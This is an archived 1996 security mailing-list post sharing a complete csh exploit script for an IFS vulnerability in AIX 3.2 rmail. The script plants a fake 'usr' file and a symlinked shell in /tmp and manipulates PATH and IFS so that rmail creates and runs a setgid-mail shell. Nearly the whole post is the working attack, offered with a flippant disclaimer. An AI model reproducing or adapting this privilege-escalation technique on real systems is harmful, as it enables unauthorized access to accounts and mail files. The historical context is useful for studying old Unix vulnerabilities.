Date: Wed, 17 Apr 1996 00:02:58 -0600 (MDT)
From: Andrew Green
To: best-of-security@suburbia.net
Subject: BoS: AIX v3 rmail exploit.

Since IBM thought it was important enough to release an announcement about it, it MUST be worth posting the exploit, right?! :)

Neither I, nor the University of Northern Colorado will be held responsible for use/misuse of this information.

Here's a relic for y'all.

#!/bin/csh
# IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994

# Setup needed files.
mkdir /tmp/.rmail
cd /tmp/.rmail

cat << EOF > usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .

# Set PATH, IFS, and run rmail.
setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail joeuser@nohost.com
unsetenv IFS
rm -f usr sh  # minor cleanup.
echo "Attempting to run sgid shell."
./mailsh

Andrew Green
agreen@bentley.univnorthco.edu